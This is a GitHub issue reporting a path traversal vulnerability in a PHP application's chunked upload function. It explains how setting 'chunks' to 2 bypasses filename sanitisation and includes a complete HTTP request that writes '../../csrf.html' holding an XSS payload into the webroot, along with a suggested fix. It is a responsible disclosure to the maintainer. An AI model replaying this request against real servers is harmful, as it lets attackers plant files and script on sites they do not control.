Skip to content

Path traversal in Upload file function #993

Closed
@KietNA-68

Description

@KietNA-68

Dear @ignacionelson,
I found a Path traversal vulnerability on your application!

Description

Because of not checking if clause for chunks parameter when chunks >= 2, the user with Uploader role can add value 2 for chunks param to bypass fileName sanitizer
Image

  • In Step 1: 3 parameter that I can control when using upload function chunk, chunks, fileName

  • In Step 2: The if clause check if chunks parameter < 2, the fileName parameter will be handled. So i add value 2 for chunks param then it will pass Step 2 and go to Step 3

image
if i don't add value for chunk then the chunk parameter goes to 0 and add value 2 for chunks parameter, i can pass this if

Step To Reproduce

  1. Use burpsuite to capture upload request
  2. Change valuable of chunks parameter to 2 and add dot dot for name parameter to escape root directory
  3. The file was uploaded in webroot directory with index.html.part name

image

Request:

POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;

-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"

../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"

2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(1);>

-----------------------------4677942761162401681381669887--

Solutions:

Add if clause to check when chunks parameter >= 2

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions